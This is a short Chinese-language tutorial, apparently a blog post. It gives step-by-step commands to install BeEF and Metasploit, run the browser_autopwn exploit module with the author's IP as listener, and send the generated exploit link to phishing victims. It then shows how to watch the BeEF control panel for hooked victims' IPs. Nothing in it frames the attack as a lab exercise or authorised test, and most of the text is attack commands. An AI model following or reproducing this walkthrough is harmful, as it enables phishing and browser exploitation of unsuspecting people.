首先安装beef-xss我用的是linxu系统
apt-get install beef-xss
选择y
开启msfconsole,如果显示是这样
说明没有安装msfconsole
apt-get install metasploit-framework
输入y,等待更新
service post g re SQL start开始数据库(运行成功并没有显示)
msfdb init开启初始化
msfconsole(成功的话会有加载项,只需等待运行框变为msf6即可)
输入search browser_autopwn
use0
options
设置端口set lhost 192.168.100.4(我自己的)你的可以通过打开一个新终端输入ip addres来查看(192开头)
set srvhost 192.168.100.4
exploit运行
这个含有192的网址就是攻击网址,发给钓鱼的人
然后新端口输入beef-xss
设置密码后回车进入网页
也就是beef的操作网页
如果钓鱼成功,那么在线那栏就会显示被钓的IP
明天更新beef-xss的具体使用方法
点个赞再走吧